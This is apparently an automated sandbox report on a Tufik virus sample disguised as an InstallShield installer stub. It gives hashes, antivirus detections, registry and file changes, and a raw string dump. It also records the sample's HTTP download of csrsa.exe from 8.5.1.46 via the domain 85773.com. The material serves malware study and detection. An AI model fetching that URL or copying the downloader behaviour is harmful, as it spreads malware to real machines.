Analysis Date2015-01-23 22:40:55
MD5027d7143cfc80280e369fe6629748cce
SHA17c386801d07d0b863294c3bcbc29aa21755b4e9f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9526adb5d8d43bb0e33eb6b04a606b4d sha1: 28182fe85edf1399ff4c21c2afd9c02f34566d59 size: 72192
Section.rdata md5: a776d4950f56f48b5506ca2a99ce2c75 sha1: 2f64556aaa730292b244812e0b16bba2a6c751dd size: 1536
Section.data md5: 4b8d7f77aee55d927a629c55cf510431 sha1: ba2cbc77367fb2aedbc0ae6532fdea3cb679d1ee size: 12800
Section.idata md5: 458dc65fdb3b609433c1ac0796db652e sha1: 8127ca331dcaffcf64267897269a0f186ec11853 size: 4096
Section.rsrc md5: d4562c73ab69c8726b26e4981b214ba8 sha1: 27116c4e56f66d250eb824c563c92e8eae4447ed size: 38400
Section.text md5: adaa6ebc53d81ff6ab71afcb5d054e73 sha1: 2f5b2c31dde4ef484ae09b292cedea997fc84b35 size: 5120
Timestamp1999-01-07 18:10:41
VersionLegalCopyright: Copyright © 1996-1999 InstallShield Software Corporation
InternalName: STUB.EXE
FileVersion: 2.04.001
CompanyName: InstallShield Software Corporation
ProductName: PackageForTheWeb Stub
ProductVersion: 2.04.001
FileDescription: PackageForTheWeb Stub
OriginalFilename: STUB32.EXE
PEhashf3db4a7ddc2568f9793c33e1f576594734791a02
IMPhashf1c86bf7ba6c9508e02f21633db7d001
AV360 SafeVirus.Win32.TuFik.C
AVAd-AwareWin32.Tufik.P
AVAlwil (avast)Tufik:Win32:Tufik
AVArcabit (arcavir)Win32.Tufik.P
AVAuthentiumW32/Tufik.A.gen!Eldorado
AVAvira (antivir)TR/Dldr.Genome.agor
AVBullGuardWin32.Tufik.P
AVCA (E-Trust Ino)Win32/tufik.J
AVCAT (quickheal)W32.Tufik.gen
AVClamAVTrojan.Downloader-98394
AVDr. WebTrojan.DownLoader.4268
AVEmsisoftWin32.Tufik.P
AVEset (nod32)Win32/Tufik.NAA virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Tufik.A.gen!Eldorado
AVF-SecureWin32.Tufik.P
AVGrisoft (avg)Win32/Tufik.A
AVIkarusVirus.Win32.Tufik
AVK7Trojan-Downloader ( 00132cab1 )
AVKasperskyVirus.Win32.Pioneer.ak
AVMalwareBytesno_virus
AVMcafeeW32/Tufik
AVMicrosoft Security EssentialsVirus:Win32/Tufik.D
AVMicroWorld (escan)Win32.Tufik.P
AVRisingWin32.Tufik.p
AVSophosW32/Tufik-Fam
AVSymantecW32.Tufik.B!inf
AVTrend MicroPE_TUFIK.JK-1
AVVirusBlokAda (vba32)Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\18f3_appcompat.txt
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 296
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1280 -e 204 -g
Creates Mutexopen
Winsock DNS8.5.1.46
Winsock URLhttp://8.5.1.46/csrsa.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 296

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1280 -e 204 -g

Network Details:

DNS85773.com
Type: A
8.5.1.46
HTTP GEThttp://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 8.5.1.46:80

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
MSCF
\
 
\\
*
c.
.
.
00-+ -E-0
-0
\
.
0
0.?- 
 
0
00 
u
040904b0
 1996-1999 InstallShield Software Corporation
!1Aa
2.04.001
#+3;CScs
Animate1
AVI(
Bad cabinet version.
Br&owse...
bytes=There is not enough space on drive %s to extract this package
Cancel
CommonFilesDir
COMMONFILES)Software\Microsoft\Windows\CurrentVersion
CompanyName
Continue
Copyright 
Corrupt cabinet file!
CRC failure.!System error during decompression
'Do you wish to cancel the installation?,The package has been delivered successfully.,Insufficient disk space to open the package!!Security error! Invalid password.
Do you wish to overwrite this file?
Error writing the cabinet file!
Fatal Microsoft Error
FileDescription
FileVersion
Finish
         (((((                  H
I Agree&Please free up %.2f %s and click Retry
Incorrect cabinet file selected-The package decompression has been cancelled.-Unable to create the specified output folder!%Unable to compute required disk spacegThere is not enough space on drive %s to extract this package.
Input file is not a cabinet.
&Installation Folder
Installation Folder
InstallShield Software Corporation
Internal data size error.
InternalName
Invalid command line option.
Invalid file compression type!
jjjj
LegalCopyright
License Agreement
Memory allocation failure!
Memory allocation failure!(Unable to open the unpacking application%Fatal error reading the package data.%Fatal error writing the package data.0Program format is invalid and cannot be updated.+This package is missing its file container.%General failure reading this package./This package already contains a file container.3This package has been signed and cannot be updated.
Missing cabinet file!
msctls_progress32
MS Sans Serif
No error
N&o to All
(null)
OriginalFilename
Overwrite Protection
PackageForTheWeb Error
PackageForTheWeb Stub
PackageForTheWeb!Unable to access the source file!"Unable to create the cabinet file!$Unable to access the specified path.=Unable to create the specified output folder.  Bad path name.*Unable to start the decompression process!5The EXE file has been corrupted.  Unable to continue."Unable to decompress the EXE file.-Unable to execute the specified command line!ZThis program is used internally by PackageFromTheWeb.  It should not be executed directly."Bad or missing header information!NThe Software Licensing Agreement file is missing.  The installation will stop.
Password
&Password:
Please enter the folder where the files should be unpacked.  If the folder does not exist, you will be prompted to create it. 
Please free up %.2f %s and click Retry.
ProductName
ProductVersion
PROGRAMFILES
ProgramFilesDir
Progress1
Reading package..."The specified drive does not exist
RICHEDIT
should not see me
%s - Installation Folder"http://www.installshield.com/pftw/
%s - License Agreement
%s - Password
Static
StringFileInfo
STUB32.EXE
STUB.EXE
%s - Welcome
SysAnimate32
SYSTEM
TEMP7The specified output folder does not exist.  Create it?
The following file is already installed on your system:
This application has been password protected.  Please provide the password.  Passwords are case-sensitive.
This installation program was created using a trial version of PackageForTheWeb.  The PackageForTheWeb Wizard must be running to execute this program.
This self extracting executable file appears to have been corrupted and cannot be executed.  You should obtain a new copy of this file to insure that it will execute correctly.
Translation
'Unable to initialize the extension DLL.%Error Executing the Specified Program
Unable to open the self-extracting executable file.  The file is locked or in use by another process.  The installation will terminate.
Unpacking '%s'...
Unpacking %s...
VarFileInfo
version
VS_VERSION_INFO
Welcome
WINDOWS
&Yes
Y&es to All
>]@%%> 
,,+),),)),$
,),),)+
,+),)+,),),$
',),),),),),)
',),),),),+'
',),),),),+$"',)
',),),),++
',),),)+)
',),+,"",),)+,),
',),+,"$+,),)
',),+,)$
'! \!_
'),)+,),),),+,
'+,)+,
'+),),
'+),),),),),,)$
'+),),),),),),)$
'+),),),),),++$"
""""",
""""""
"""""""
""""""",
""""""""
"""""""""
""""""""""
""""""""""$
"""""""""$$
"+^ +]
"+,),,+
"+,),),+,)
"+),)$
"+),)+),,
( +---
),),),),)
),),),$
),),),+),
),+),)+,),),),+,
),++,,)'"
)),),),),),)
)),),),+)+),
)),),),+)++
)+)))$
)++,+)+
$,),),)
$,),),),),),),)
$,),),+
$,),),+,+
$,),),+),)+$
$,+),),)+)$
$',,,,)
$"$,),),),,
$"$,+),)+,),),),$
$$)+,),),),$
$+,),),+),+)
$+,),+,+,
$+),),
$+),),),),),),),)
$+),),),),),),),+
$+),),),),),)+,+,
$+),)+,),),),)'
$+),+'")),),+),'"
$+)+,),),),)
+,),)+,,+
+,+),),),),),),)
+,+),),),),),)+)
+,+),+)$"+,),$"$
),,+)+,+)$0=<<<&
$,,+,),+,'&;0
0,1~\L
09t$(w
09t$(w29t$ u
0B=8jA
"0>DFf+
0<@*eP
0=}PzpiK}
.0]x5a_MsT
0<x7n!p,\
0x;lFc
#<^=17
19wUvSM
 1Hcq9T
1#QNAN
1R29:Vf
1RpgH.
1#SNAN
1SR79Uk
\1@*SvFH
?]1:T6
1W/i\gu
;1 __x
2*1:6:
27:767
^'27~g]
28::6%
2| _AY
@2$BeXs
`2D_D_
@#2Dm]
2j$2Cg#
;){2j}-o
2}k#-E
$ 2_o@
2rc;9=F
2u7nFuBF
:(2uQ@
&2%w/t
2(zArzQb
|3}-|2i
34444444444
!37M}8
#{}#>3P
3*t-.u.W
3Z`l(,~
~4,2$\
!44.0???;;=====<<&
!444.$+)+,),),),)
.4444.)),)+,),),),)'
&44444.
.4444429?=<9&$,),)+,),
444444.!'+,),)+,),),),$
4444442',),)+,),),),+,
.44444444
!44444444444.0?=<9&$,),)+,),
4444444444444!',+),)+,),),),$
!44444444444440;0
!444444444.9?>;=<<0!'+,)+,
.44444.9;0
4444.&9???;;=====<<&
.4444*9?>;=<<0!'+,)+,
.444*9??;;==<<<0
44.#;;9;?>/5>9<==<;#
.4&;;;;?>/5>9<==<;#
4a-:.L*
=4j|PvV
4oiLcj
4r&'*h
['4T!O
-4U"gw
5^6*Dr]
5JLeyIu
5Pc#Y%
68kyA2
&"6;;;9>5
6[CEE~[
)6&D-K
]6eVO[a
"}6F_Gd
\.6L(X
6N,2E"
727^73
74\o@J
	75==<;# 
;[7@:\B
7DRNJ<V.
7!E$FL
.7>f<ER
7""J;4
'7	jd\K
7S;N/F
,`7XJm
8` 0T[
8444444&9??;;==<<<0
84}|bB
-88Bnu
89|$(w
8LDICt
8mS>/>
8q%}|.
8QDICt
8TxK(k
8UM\2^
8Y7v#b
,,,+),),)!9;===<;#
\9+3WdiP.m6>
([95r2
^=_98j
9;;;9>5
9D$*u,9D$.
9GfJbN
9j%@h8}
9;kSH:
9LDICt
9QDICt
9's>TJ1
9U5+*l
a@1h&C
a3P+^-6
"a6&N#
a:?9GW
abnormal program termination
ADVAPI32.dll
AfD'8Q,
A+F	`u
a[[Gfp
\>>%ai
aI76Fv
aK7@On(
alVV.ej
AMNmT"ph
A|}q98
Aqy	"GZ
aTQ_[C
AVI LIST
"""""""""B
|b4or$d
""BB@ffffffffffffffffff
""""B@ffffffffffffffffff
""""""""""""""B@fffffffffffffffffff
%@-bI`
:B`]iFQ
+#bo+=
B'o*!<
'BPgtE
B/q.K"
bRBx;9j
\|BS=S
_bu5@O
^b|uL^
BUTTON
bv.nYn]6
bW=B6Q
B*<ZlZ/i
c"$^(?
c2^fh'
&c9VR4
c,{BoKs
cEG*u3
CharNextA
CharNextExA
ch$QybY
CloseHandle
C!nn*^(
{\colortbl\red0\green0\blue0;\red128\green0\blue0;\red0\green0\blue255;\red128\green128\blue128;}
COMCTL32.dll
CommonFilesDir
CompareStringA
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateFontIndirectA
CreateProcessA
CreateWindowExA
;CTr+4
C<%u	C
/	cvx$m
Cw9AFy2f
&	CWHq.Qx
`\\:.}d
+D$ _^][
D$ _^]
D$09D$
D$0PVQh 
D,=2`4
^-D5))AZg
`D5tom^
D8,i,l|
D$8;t$(
D$(9D$8
D$,A@+
dA@8LR
@.data
Dcm	GpkuU(
/Dc[]Q
D$(+D$ 
Dd7]1D
DDDDDDD
DDDDDDD@
DDDDDDDDD@
D$Df9D$4u
DD@fffffffffffffffffff
Debabelizer Stream 1pJ
\deflang1033\pard\plain\f2\fs22\cf1\b %s\plain\f2\fs22\cf2\b 
DeleteFileA
DeleteObject
DestroyWindow
D@ffffffffffffffffff
$D@fffffffffffffffffff
"$D@ffffffffffffffffffff
d}G\l=
d&{'h2(~
Dialog1000
Dialog1005
DialogBoxParamA
Dialog%d
DispatchMessageA
#DK[/6
d: K/J
!dKjIG
DLF$t2Q
D&{$N^
d](N"4
DOMAIN error
DosDateTimeToFileTime
D$<PRQ
D$ PRQ
~	d}Q:
dQ\#1heT
Dqb8FA
#dtf9U
D$TRVP
>D;W0c
dyP+%I1EK	
<|e$0f
e0}ZT{
.e4dtw5
E95ax':
E(a9[p
EB2$M~
[e;]/h
ei:]iZ
.En+*9
EnableWindow
EndDialog
$Esf8z
euoH9f1a
E`vN'OI
eWb:XD
ExitProcess
ext.dll
e Y6F5
e^y.o~
EysGR4
f6FQ/8"
+}@f*6Z
f9L$6t
f9|$(w
fdCA`>
/F$EZa=
(f@f;F
ffffff
fffffff
ffffffff
ffffffffDL
fffffffff
fffffffffd
ffffffffff
ffffffffffd
fffffffffff
ffffffffffff
ffffffffffffd
fffffffffffff
fffffffffffffd
ffffffffffffff
ffffffffffffff`
fffffffffffffff
fffffffffffffff@
ffffffffffffffff
ffffffffffffffff`
fffffffffffffffff
ffffffffffffffffff
"""",""$$ ffffffffffffffffff
ffffffffffffffffff`
fffffffffffffffffff
"""$ fffffffffffffffffff
fffffffffffffffffff`
ffffffffffffffffffff
"""""""""""""@ffffffffffffffffffff
ffffffffffffffffffff`
fffffffffffffffffffff
"""""""""" fffffffffffffffffffff
fffffffffffffffffffff`
ffffffffffffffffffffff
(ffffffffffffffffffffff
ffffffffffffffffffffff`
fffffffffffffffffffffff
fffffffffffffffffffffff`
ffffffffffffffffffffffff
ffffffffffffffffffffffff`
fffffffffffffffffffffffff
fffffffffffffffffffffffff`
ffffffffffffffffffffffffff
ffffffffffffffffffffffffff`
fffffffffffffffffffffffffff
fffffffffffffffffffffffffff`
ffffffffffffffffffffffffffff
ffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffff
fffffffffffffffffffffffffffff`
ffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffff`
ffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffff`
ffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffffffffff`
ffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff`
ffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff`
fffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffo
fffffffffffffffffffffffffh
ffffffffffffffffffffffffh
fffffffffffffffffffffffh
ffffffffffffffffffffffh
ffffffffffffffffffffffo
fffffffffffffffffffffh
fffffffffffffffffffffo
fffffffffffffffffffff`w
ffffffffffffffffffffh
ffffffffffffffffffffo
ffffffffffffffffffff`w
fffffffffffffffffffh
fffffffffffffffffffo
fffffffffffffffffff`w
ffffffffffffffffffh
ffffffffffffffffffhff&
ffffffffffffffffffhgg
ffffffffffffffffffo
ffffffffffffffffffow
ffffffffffffffffffowr'wwwww
ffffffffffffffffffoww
ffffffffffffffffffowww
ffffffffffffffffffowwww
ffffffffffffffffffowwwww
ffffffffffffffffffowwwwww
ffffffffffffffffffowwwwwwwww
ffffffffffffffffffowwwwwwwwww
ffffffffffffffffffowwwwwwwwwww
ffffffffffffffffffowwwwwwwwwwww
ffffffffffffffffffowz
ffffffffffffffffffvvf
fffffffffffffffffgfw
fffffffffffffffffgggo
fffffffffffffffffgvvv|
fffffffffffffffffhf
fffffffffffffffffhfggg
fffffffffffffffffhg
fffffffffffffffffhgggo|
fffffffffffffffffhgo
fffffffffffffffffhvvv
fffffffffffffffffhvw
fffffffffffffffffkfvfl
fffffffffffffffff`w
ffffffffffffffffk
ffffffffffffffffo
fffffffffffffff`w
ffffffffffffffkfffffhf
fffffffffffffkffff
fffffffffffff`w
ffffffffffffk
ffffffffffffkffffkff
ffffffffffff`w
fffffffffffk
fffffffffffkffffkfffff
fffffffffff`w
ffffffffffk
ffffffffffkffffkfffkffff
ffffffffff`w
fffffffffk
fffffffffkffff
ffffffffh
ffffffffkffff
ffffffffkfffkfffkfff
ffffffffkkkffffffffffffffffffffffffffffffffffffffffffffffff
fffffffh
fffffffk
fffffffkfff
fffffffkfffkfffkfff
ffffffk
ffffffkffkfff
ffffffkffkfffkfff
ffffffkkkkfffffffffffffffffffffffffffffffffffffffffffffffff
fffffkff
fffffkffkff
fffffkffkffkfff
fffffkkf
fffkfffkfff
ffkfff
ffkfffffffffffffffffffffffffffffffffffff
ffkffffffffffffffffffffffffffffffffffffff
ffkfffffffffffffffffffffffffffffffffffffff
ffkffffffffffffffffffffffffffffffffffffffff
ffkfffffffffffffffffffffffffffffffffffffffff
ffkffffffffffffffffffffffffffffffffffffffffff
ffkfffffffffffffffffffffffffffffffffffffffffff
ffkffffffffffffffffffffffffffffffffffffffffffff
ffkfffkfff
FGD -\
FH+N03
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FinishButton
Fk6Uu@
fkffffffffffffffffffffffffffffffffffffffffffffff
fkfffffffffffffffffffffffffffffffffffffffffffffff
fkffffffffffffffffffffffffffffffffffffffffffffffff
fkffkffkfffffffffffffffffffffffffffffffffffffffffffff
fL(2;$
- floating point not loaded
FlushFileBuffers
FormatMessageA
f`POJ$'
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
fYdD=bEg
F<Zbom
 g-^,}
g"",""""""""""
G2F&[J
g%C1<J
`#gC]sG
GDI32.dll
GetACP
GetActiveWindow
GetClassNameA
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetDesktopWindow
GetDeviceCaps
GetDiskFreeSpaceA
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileAttributesA
GetFileSize
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetOEMCP
GetParent
GetPrivateProfileSectionA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSysColor
GetSystemDefaultLCID
GetSystemDirectoryA
GetTempFileNameA
GetTempPathA
GetTextExtentPointA
GetVersion
GetWindow
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
gevI)V
{/=%G&g
<G$,{H
G(QSRP
,_G;@r
G*$*R|,P
gti	$+
GYd/VM
`h````
<h?-..
{"*h]=
H:>_3f}
hdrlavih8
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
H,h\`>
hH}Dk]M
hhr3)URLM
h%_Il4\CVI
H@jwoY
H#kK!4I$L
.@^hM*
*hpoj]
hqcf	oH`
H,%Rtm
-HS0",v
HSt#{U
HSUVWh
Hy|Gs(V
!I0ld60M
%[I}bo
ic0=F#D
%|iCi/t4*
.idata
ID])C~
]IH,P>X
 ijG{+
+IjlrY
I\@L;K
`iLm_H
In~eq1
InstallShield
ir5^kB
IsCharAlphaA
IsDBCSLeadByte
ISGlyph
is.HX,
?IsProcessorFeaturePresent
i|ul",
I![~Uo
J.\=&+
j2Qj2h0AA
j2Qjeh8BA
j*6mk[
J a+A[t
]JB hP
jdRj1h
 J%f_i
>JfXI>M
jGE1'cs
(jk,xTP
jO^[b!
\jrcZD
@J\S'I
j;t~ON
+jUu"TF2
^K*$, 
k3%Y,=
Ka70e`
 kCAp`
	k;CO!u*
KERNEL32
KERNEL32.dll
kffffffffffffffffffffffffffffffffffffffffffffffff
kfffffffffffffffffffffffffffffffffffffffffffffffff
K"go#rs2!#i8O/*%":+
KillTimer
kIqr]dSwmbS
KK<5|1;
kkfffffffffffffffffffffffffffffffffffffffffffffffff
KofV(<
kPxHg-x
KqHuv'
ku}Bt0L
Kv[	[f
KW5%qM
kyW4$@_=
-kZwqk
L$0	D$
L5sJ5J
l$8+l$
L$8;L$(
LCMapStringA
LCMapStringW
L$<#D$
~LdD#G
LD@ffffffffffffffffff
>LDICt
L$<h(DA
;l$Hv 
[LK0dS
/'""""""",""LL
L$!;l$0w
LLD"D@fffffffffffffffffffff
LLLB"LLLDDD@ffffffffffffffffffffff
L#oAb{
LoadLanguage Failed
LoadLibraryA
LoadResource
LoadStringA
LocalFileTimeToFileTime
LockResource
L$ PQF
LQN)E7E
L$ RQP
lstrcatA
lstrcmpA
lstrcpyA
lstrcpynA
lstrlenA
=lU;	A
L>usjm
{LV/P\o
LZ32.dll
LZClose
LZCopy
LZOpenFileA
MapViewOfFile
MapWindowPoints
>MDICt
MessageBeep
MessageBoxA
$-,M\H
_?)@\M@i
Microsoft Visual C++ Runtime Library
M*Il6q
M,lL76$U
MoveFileExA
movi00db
MUI46v
MulDiv
MultiByteToWideChar
m%[V'k
M-!~\Y
MyZ>}-
mZ`"TY~
n[!0,C\#
n1_aOa
?N1K^9
n2*y[d
\:#n^6
Nc6[}9
!nD'cl
{:,nhaal|[
nj2syj
nMb"r]6X
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`npN+`
NrU$!J|
&nsdI..
<(NTDV
nTZMqo
(null)
|nxh{-/
o&"""",
o0$,Id
O7'4*}
OAw`8]
obA#U8
oBgRvj
=oB*yY 
)\OcyI
OFeew$
O:fk8-
OgH+o1
OI]s=(L;
oJE%'%W
oJw8Ea
{/oK2]e
OM~5du
OmX5>pV
-ONxT:G
OreW[r
o_TK"7B	
O.z0{c
P[3m!X
p8tZ1u
PackageShutdown
PackageStartup
\par }
\par \plain\f2\fs16\cf3 %s\plain\f2\fs20\cf0 
\par \plain\f2\fs20\cf0 %s %s
\par %s
\par %s %s
~{P$!Ca
pd?e)M
PeekMessageA
pftw%d.pkg
pim@zj
$PjPOF
pk3?MK
pk+FawLz
PostMessageA
PP(Ca?y
PPPPPPPP
ppxxxx
Program: 
ProgramFilesDir
<program name unknown>
PropertySheetA
P]u"l=.8
- pure virtual function call
p!<vN~Rq
P*zW?&
"q1{`L
&>qb>2#
>QDICt
q<|~FQ
-qgAWYP
%;/qhK
[Q}>I^
QjfhDBA
Q:KG4D
~qm2oY)
QMU8.G.
+Q^OSp'
qoYzlD
Q_q9V}GL
QQ.exe
QRh\@A
QRhpBA
Quh`'7
`\-Q~v
qv@X=_slx
r"""""""
r""""""""",
r"""""""""""
R4Le$i
R<6JiIme9~V
R6l;}R
=r7xGPw
	raD	w&
@rAP>l
`.rdata
RDFvWz
ReadFile
Recycler
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
ReleaseDC
RemoveDirectoryA
rename
rf^!~%vO
RICHED32.DLL
r,ixN%
/RO^.5
RoqT3{
r. OuT
&Rp:Z6
RQSWVU
r,&.RN^
_R|)|s1
RSGWGT
{\rtf1
{\rtf1\unicode\deff0\deftab720
RtlUnwind
@*(Rtr
runtime error 
Runtime Error!
*RV3e=
RVh CA
_rzTz|
r'z`z@
,^s56`
s}`/77y
@s@CG|-Vy
ScreenToClient
Sdo %l
SelectObject
SendDlgItemMessageA
SendMessageA
SetBkMode
SetDlgItemTextA
SetFileAttributesA
SetFilePointer
SetFileTime
SetFocus
SetHandleCount
SetStdHandle
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHBrowseForFolderA
shell32
SHELL32.dll
ShellExecuteA
SHGetPathFromIDListA
Si.dJR?=
SING error
sLS>{g
SOFTWARE\Microsoft\Windows\CurrentVersion
soS48n
%spftw%d.pkg
{sQ,<F
SQRUVW
SQRVWU
%s - %s
/SS/GF
SS;u,\
s~++-sw
Static
^Stjfn
Strings
strlstrh8
SVRPSW
sv#wgethostbyname
\SYSTEM32
SystemParametersInfoA
T$0UPQRS
^t2+"^
t4P!kW0
;t$8s+
t~>a?W
tcfHWf
TD5w^Y
T$DQPR
TerminateProcess
.text 
@.text 
TextOutA
!This program cannot be run in DOS mode.
$th~qd
t$,j$PQ
T$ )L$
TLA$/d
TLOSS error
ToA)y"L_
toHXti
tooltips_class32
TQFA\<
TranslateMessage
T$ RSUW
T$(SUVf
tsy;7[Q
t.;t$$t(
T$(UPQRS
t]%WH8p
TX+<0$
u!a71{0;
U')Fp2@
^;?U#I
ui}(Jz
uJ8 Z"
UjEHlb
u}JFQ.IK
_^U]JU
Unable to Execute!
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnmapViewOfFile
UnpackFile
uog~o+U<
URLDownloadToFileA
Urlmon
user32
user32.dll
USER32.dll
UsGW5"[q
$UuVQt
Uwv6 ;G
u	_X&#[
uX*3e2
UxeD.Pb
uyp1WY`
uy|zIk
vb6rU'
<V}bj{
VC20XC00U
vCloseHandle
vCreateFileA
vCreateFileMappingA
vCreateMutexA
vCreateThread
VE%Eka
	`V?f*
vFindClose
vFindFirstFileA
vFindNextFileA
vGetDriveTypeA
vGetFileSize
vGetLastError
vGetLocalTime
vGetLogicalDriveStringsA
vGetTempPathA
vGlobalAlloc
vGlobalFree
vidsDIB 
VirtualAlloc
VirtualFree
"vLoadLibraryA
vlstrcatA
vlstrcmpA
vlstrcpyA
vlstrlenA
vMapViewOfFile
vq4sm8yu
VrekaQ2
v(?RU;
VRWSUP
vSetEndOfFile
vSetFilePointer
vSleep
vSzS	YP
[vtTU!8
vUnmapViewOfFile
vWriteFile
}?Vy|?3
vZ[;D2
v/ZR'u
w'"""""""""""
&W%3t;q
=}W6sT
\&W**:7
)<w8uIn
;W9T,K
WaitForSingleObject
W%`&[e6
welcome
W&#=$f
wGohGk
wh<b1Hp
WHW-.VS
WideCharToMultiByte
WINDOW
"winet_ntoa
wininit.ini
wJ]>j2m?"
%.Wl|s
(wLy"'IJ'r
$:?w/O>
>WQ  v5;u~
wr""""""""",
WriteFile
WritePrivateProfileSectionA
WritePrivateProfileStringA
wRtlMoveMemory
W/r@u	
wS6n^zVt"O
wsprintfA
wsuShellExecuteA
/wT	m'(1
WuBh05A
:wv`pc
Wvshlwapi
WvStrStrIA
"wWs2_32
:"wWSAStartup
WWURj	S
wwwwww
wwwwwww
wwwwwwww
wwwwwwwww
wwwwwwwwwwww
wwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwx
wwwwwwwwwwwwwwwwx
wwwwwwwwwwwwwwx
wwwwwwwwwwwwx
wwwwwwwwwwx
wwwwwwwwx
wwwwwwwx
wwwwwwx
wwwwwx
ww"wwwx
wxffff
wxfffff
wxffffff
wxffffffffffh
wxfffffffffh
wxffffffffh
wxfffffffh
wxffffffh
wxfffffh
wxffffh
wxfffh
wxfftGwx
wxffwtGww
wxffwwx
wxffwxw
X"]~  
X2]l=4
~x9~0v
"X@AY_
xb#qnJ
Xe.-+'
?xH"A#
XHR"t+
Xjy,_-C
xm~>K5
!xMoK6
<x'<N0w
XQntG(
?xtpn.Q
<xt	<X
Xw-jU5
XXgL<i%
,X>XN=
Y4qpECSCKg
Y 5Q[[
Y)L`$Zp^
Y:,m([
_Y#S&O
yUZ@}!
y#w(jw
Yxx9-[
 ]^_[YZ
*z`?-[
zBy!"Ue
Z:+gO=
zIc/gtnW
ZJXgr7C{
%Zlqoq
~z)qra#
;=zr$:
=?Zs1z
zwTU5TK
Z>x+q@H
_^]ZY[
]_^ZY[